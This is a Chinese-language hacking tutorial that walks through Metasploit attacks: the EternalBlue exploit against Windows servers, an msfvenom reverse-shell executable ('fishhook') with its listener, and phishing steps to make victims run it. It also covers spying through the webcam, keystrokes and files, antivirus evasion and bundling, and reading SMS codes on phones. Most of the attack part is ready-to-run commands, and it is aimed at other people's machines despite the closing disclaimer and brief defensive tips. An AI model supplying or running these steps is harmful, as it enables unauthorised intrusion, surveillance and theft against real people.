黑客技术总结

免责声明：

黑客离我们并不遥远，我们平时所说的网络安全，工程师，白帽子等等，都是具备服务器、个人电脑等能力的，他们只是不像黑客那样搞破坏，而是防黑客入侵保护系统防止被破坏被盗取等等。

什么是？个人理解就是入侵别人的系统或者入侵别人的电脑拿到用户权限后可以做任何事，可以选择搞破坏、删系统或者窥探隐私、盗取文件等等。

我想像黑客那样进服务器、个人电脑，我应该需要什么？

1.VMware

一款很火爆的，可以装载虚拟机的软件，可以自己搭建windows，linux等等。具体的下载和基本使用方法，建议参照B站教学​​​https://www.bilibili.com/video/BV1pz4y1D73n?p=2&vd_source=791674f04f7270b40ba9c9d5a7e3281e​​。里面会提供下载包，还有各种权限码。

2.kali_linux

黑客最常使用的linux版本，热度排行第一，里面装载了黑客常用的工具，功能十分强大。

​​https://www.kali.org/​​ 这个就是官网，直接在官网下载下来即可，大小2.5G左右。

kali-linux不同于其他linux还需要下载镜像iso自己安装，它下下来直接解压，找到.vmx文件用VMware打开即可正常使用，很便捷。

一般可以分为几种：

一.进windows服务器

二.进linux服务器

三.进个人windows系统

四.进android系统

操作可以总结为三步：

使用模块->配置模块->运行模块

一.进windows服务器，我需要什么操作？

打开kali linux，默认初始账号密码都是kali

打开kali_linux终端

提权：

sudo su

获取本linux的ip地址：

ifconfig

找图中inet后面那个就是该linux的ip地址

进入一款非常火爆常用的黑客工具metaspolit 简称msf

打开msf：

msfconsole

使用模块：这个模块“永恒之蓝eternalblue”可以   window操作系统的漏洞，堪称十大高危漏洞之一。

use exploit/windows/smb/ms17_010_eternalblue

查看必选项：

show options  或者 options

找到require 一栏并且标有yes的地方完善它们。

此时你得拿到windows服务器的ip地址才能它，这应该也是难点，可以用nmap工具来扫描端口当前内网中有多少端口和对应ip地址（nmap也是一款kali linux的黑客工具，具体使用可以去查一下）

也可以用自己安装的windows iso镜像来充当靶机受害目标，进到windows 的cmd里输入ipconfig拿windows服务器的ip地址，设置好参数就可以开始了。

设置RHOSTS

set RHOSTS 192.168.1.0-254

这可以0--254端口

也可以设置一个win服务器的ip地址：

set RHOSTS 192.168.1.133

设置lport端口 ，也叫监听端口，listenport

set lport 6666

这可以在1--65535个端口数中随便设置，只要不冲突部长用那个。

开始：

run    或者  exploit

成功：

拿到了服务器的权限，可以像cmd那样操作了。

补充操作:

此时在如图界面输入

可以进到服务器的cmd里，大概率会中文乱码

此时再输入如下命令，可以正常看清中文，更详细操作请看​​https://blog.csdn.net/GUN_C/article/details/127868721​​

chcp 65001

二.linux服务器我该需要什么操作？

详细请看：

​​https://www.bilibili.com/video/BV1sv41187aW/?spm_id_from=333.880.my_history.page.click&vd_source=791674f04f7270b40ba9c9d5a7e3281e​​

三.进个人电脑，我该怎么操作？

制作鱼钩，设置监听。

只要诱导别人下载运行你的鱼钩，就能入侵对方的windows个人电脑。

操作和上类似

提权和找到本机的IP地址

sudo su

ifconfig

这里开始不同，制作鱼钩：

不需要打开msf，直接在shell输入：

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.43.133 lport=6666 -f exe -o /home/kali/Desktop/myhook.exe

将制作好的鱼钩想办法弄到对方电脑里，例如直接拖拽myhook.exe到我的windows10上。

此时会有火绒或者360等把该exe文件干飞，需要免杀加密保护操作或者需要退出杀毒软件信任文件。也可以自己搭建一个windows的虚拟机。

设置监听：（这里都是模板套路）

msfconsole

use exploit/multi/handler

options 或 show

要注意更改的地方:

设置模块：

set payload windows/x64/meterpreter/reverse_tcp

设置监听机的ip地址，就是本kali linux的ip地址

set LHOST 192.168.43.133

设置监听端口：

set LPORT 6666    这里必须和你设置的exe文件的端口对应！

运行，等待鱼儿咬钩！

run   或者

此时在靶机上运行myhook.exe，双击后会在后台运行。

linux上就有反应。成功入侵对方电脑，拿到权限

入侵了对方电脑我可以做什么？

可以操作对方的电脑，删文件或者打开摄像头，监听录音，监听键盘等等。

查询对方是否有摄像头：

webcam_list

键入​​webcam_stream​​可以打开对方摄像头

ctrl+C可以终止摄像。

exit可以退出控制对方电脑。

也可以输入命令：​​shell​​​进入对方dos命令窗口，如果发现有中文乱码，可以尝试键入​​chcp 65001​​​，使得UTF-8有效，即可看清中文。详细参考 ​​https://blog.csdn.net/GUN_C/article/details/127868721​​

这里有几种可以过火绒和360的操作：

详细请看视频：​​https://www.bilibili.com/video/BV17a411d786/?spm_id_from=333.880.my_history.page.click&vd_source=791674f04f7270b40ba9c9d5a7e3281e​​

这个免杀我试过，火绒不会查杀，查了也不会报错。而且关了后台也没用，当时被控的时候关后台清理exe文件也不会断掉控制。

但是不好的一点在于它生成的文件都在root里，火狐没权访问进去，因此一些打开摄像头操作就失效了。

也可以写一个c语言来触发运行

还可以设置捆绑，当运行目标程序的时候自动也运行你的鱼钩。这个大概率也会被查杀。库会一直更新，过程就是不断迭代更新的，失效了就失效了。

详细请看：​​https://www.bilibili.com/video/BV1KM411z7pa?p=8&vd_source=791674f04f7270b40ba9c9d5a7e3281e​​

四、android个人手机，我该怎么做？

详细操作请看：

​​https://www.bilibili.com/video/BV1iS4y1r7do/?spm_id_from=333.880.my_history.page.click&vd_source=791674f04f7270b40ba9c9d5a7e3281e​​

直接总结一下，和上面类似的：

1.制作鱼钩

2.设置监听

3.让对方手机下载你的鱼钩并运行就能入侵对方手机。

但是现在kali linux生成的apk版本有点老，手机显示没法运行，只有一些博主展示了在电脑老版本的安卓虚拟机才能正常入侵成功，我的vivo没成功入侵。

入侵了对方手机后可以干什么？

打开摄像头，获取通话记录，获取短信内容验证码信息，获取照片图片拷贝到linux等等，详细操作都在视频里。

知道了黑客如何你的电脑了，那么自己也会形成对策。

1.别乱下网上的，有些是为了获取权限，但有些人不想获取选线，只是想搞破坏，一运行电脑直接被删。

2.如何查看当前电脑是否有其他黑客正在访问？

管理员权限win+R打开cmd

键入​​net session​​就能看到是否有其他的ip计算机访问我们的电脑。

可以用命令​​net session /del ​​把正在入侵的ip清掉

3.防火墙，杀毒软件保持生效。

俗话说：kali学得好，牢饭吃到饱。

以上内容仅供个人学习参考，不可用作非法途径，将传播到网上被抓会被判十几年牢吧。